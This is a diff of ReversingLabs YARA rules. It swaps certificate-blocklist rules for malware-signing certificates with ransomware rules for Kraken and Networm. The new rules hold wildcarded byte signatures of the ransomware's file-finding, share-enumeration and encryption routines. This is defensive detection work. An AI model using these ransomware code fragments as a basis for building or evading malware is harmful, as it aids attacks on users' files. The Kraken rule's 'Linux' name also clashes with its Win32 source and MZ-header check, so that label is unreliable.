+            80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ?? ?? ?? 46 83
+            C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v2_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
+            ?? 8B F1 89 75 ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
+            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 0F 1F 80 ?? ?? ?? ??
+            66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
+            33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            F8 89 7D ?? 33 C0 66 89 07 FF 75 ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
+            ?? ?? ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B CA 89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 90 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 89
+        }
+		$encrypt_files_v2_p2 = {
+            4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 7E ?? B9 ??
+            ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 7D ??
+            57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 51 57 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
+            56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50
+            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ?? 8B 4D ?? 13 4D ?? 89 4D ??
+            3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF
+            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 57 E8
+            ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ??
+            8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B 7D ?? 8B CF E8 ?? ?? ?? ??
+            83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 8B CF E8 ?? ??
+            ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 7D ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 75 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:ad:46:ce:4d:b1:60:b3:48:c2:4f:66:c9:66:31:78" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $manage_gui_p* ) ) and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $encrypt_files_v1_p* ) ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_256541E204619033F8B09F9Eb7C88Ef8 : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Kraken : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Kraken ransomware."
 		author = "ReversingLabs"
-		id = "d4a5eb19-2964-5d3a-b4c5-ee4396e76814"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7c302c2e-6ffc-5f51-90f4-c4ebd6c1c28b"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1416-L1432"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e33cedf1dd24ac73f77461de0cef25cad57909be2a69469fec450ead7da85c65"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Kraken.yara#L1-L151"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4a3867aba4dbdce5d008331a3058f57b00db246975fc4d77b79ab49d5f0bbb15"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Kraken"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HON HAI PRECISION INDUSTRY CO. LTD." and pe.signatures [ i ] . serial == "25:65:41:e2:04:61:90:33:f8:b0:9f:9e:b7:c8:8e:f8" and 1424303999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_00E8Cc18Cf100B6B27443Ef26319398734 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
-		author = "ReversingLabs"
-		id = "f7e80c51-9dcf-599a-8164-c07cf4c9c5ff"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1434-L1452"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "68e9df056109cae41d981090c7a98ddc192a445647d7475569ddbe4118e570c5"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_volumes = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? 00 A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 50 45 4C 00 C7 45
+            FC 00 00 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            8A 06 84 C0 0F 84 ?? ?? ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8B D4
+            C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 83 7A ?? ?? 72 ?? 8B 02 EB ?? 8B C2 C6 00
+            ?? 80 3E ?? 75 ?? 33 C9 EB ?? 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 51 56 8B CA
+            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 C6 ?? E9 ?? ?? ?? ?? BA ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ??
+            ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 68 ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8
+            ?? ?? ?? ?? 8B E5 5D C3 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
+        }
+		$enum_shares_p1 = {
+            50 56 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
+            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 66 0F 1F 44 00 ?? FF 75 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 56 8D 45 ?? 89 75 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 33 FF 0F 1F 40 ?? 3B 7D ?? 0F 83 ?? ?? ?? ?? 8B C7 C1 E0 ??
+            03 F0 F7 46 ?? ?? ?? ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 06 83 C4 ?? 8B C8 0F 11
+            00 0F 10 46 ?? 0F 11 40 ?? E8 ?? ?? ?? ?? 8B 75 ?? B3 ?? 47 EB ?? F7 46 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 8B 56 ?? 85 D2 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 71 ?? 8A 01 41 84 C0 75
+            ?? 2B CE 51 52 8D 4D ?? E8 ?? ?? ?? ?? 51 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
+            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B
+        }
+		$enum_shares_p2 = {
+            4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8
+            ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 55 ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 55 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ??
+            C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6
+            C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ??
+            E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ??
+            8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ??
+            E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B
+            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
+            8B 75 ?? B3 ?? 47 E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 E9 ?? ??
+            ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ??
+            ?? ?? ?? C3
+        }
+		$find_files = {
+              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
+              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D 4D ??
+              C6 45 ?? ?? 8B 75 ?? 83 FE ?? 8B 7D ?? 8B 55 ?? 0F 43 CF 6A ?? 68 ?? ?? ?? ?? E8 ??
+              ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 CF 68 ?? ??
+              ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43
+              CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ??
+              6A ?? 0F 43 CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57
+              C0 C7 45 ?? ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+              45 ?? ?? ?? ?? ?? 83 FE ?? C6 45 ?? ?? 8D 4D ?? 0F 43 CF E8 ?? ?? ?? ?? 8B F0 89 75
+              ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B D6 50 8B CE E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ??
+              85 DB 0F 84 ?? ?? ?? ?? 8D 7B ?? B9 ?? ?? ?? ?? 8B C7 66 0F 1F 44 00 ?? 8A 10 3A 11
+              75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 F6 EB ??
+              1B F6 83 CE ?? B9 ?? ?? ?? ?? 8B C7 0F 1F 40 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
+              ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 3B F0 8B
+              75 ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 57 3D ?? ?? ?? ??
+              75 ?? E8 ?? ?? ?? ?? 50 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC
+              ?? C6 45 ?? ?? 8B CC 8B D0 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
+              ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+              83 EC ?? C6 45 ?? ?? 8B CC 8D 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4
+              ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
+              83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ??
+              ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+              C4 ?? B8 ?? ?? ?? ?? C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ??
+              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
+              E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
+              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 C6 45 ??
+              ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7
+              41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 45 ?? 6A ??
+              50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41
+              ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00
+              ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D
+              4D ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 7D ?? 0F 43 05 ?? ?? ?? ?? 83 FF ?? FF
+              35 ?? ?? ?? ?? 8B 75 ?? 0F 43 CE 8B 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
+              ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
+              C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+              83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8
+              ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8
+        }
+		$encrypt_files_p2 = {
+              84 C0 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ??
+              ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45
+              ?? 6A ?? 0F 43 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B
+              D8 83 FB ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 68 ??
+              ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 1B D7 01 05
+              ?? ?? ?? ?? 11 15 ?? ?? ?? ?? 83 65 ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 8B FA
+              8B F0 8B 55 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 6A ?? 1B D7 01 05 ?? ?? ?? ??
+              8B 45 ?? 11 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 6A ?? 83 15 ?? ?? ?? ?? ?? 6A ?? 53 FF
+              15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 FF 75 ?? FF 35 ?? ??
+              ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 53 1B D7 01 05 ?? ?? ?? ?? 11 15
+              ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 51 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 83
+              79 ?? ?? 72 ?? 8B 09 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D
+              ?? E8 ?? ?? ?? ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ??
+              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
+              64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syngenta" and ( pe.signatures [ i ] . serial == "00:e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" or pe.signatures [ i ] . serial == "e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" ) and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_volumes and $find_files and ( all of ( $enum_shares_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_62Af28A7657Ba8Ab10Fa8E2D47250C69 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Networm : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects Networm ransomware."
 		author = "ReversingLabs"
-		id = "cba20a1b-5d24-5a1f-8f2f-8c47add846d6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3b17b97d-c882-5f65-8b89-847e2300873c"
+		date = "2021-07-05"
+		modified = "2021-07-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1454-L1470"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c3c034cb4e2c65e2269fbfd9c045eb294badde60389ae62ed694ea4d61c5eb35"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Networm.yara#L1-L103"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ff9bcb9868522f9d4abf2ab9f94d5b7c9b009e5c6d0cf832c7d052f18e048b31"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Networm"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFINA Fintek" and pe.signatures [ i ] . serial == "62:af:28:a7:65:7b:a8:ab:10:fa:8e:2d:47:25:0c:69" and 1404172799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_04C8Eca7243208A110Dea926C7Ad89Ce : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
-		author = "ReversingLabs"
-		id = "484d0aa6-0447-5e60-946b-89b01a5e43dd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1472-L1488"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0012436e83704397026a8b2e500e5d61915e0f4c8ad4100176e200a975562e8f"
-		score = 75
-		quality = 90
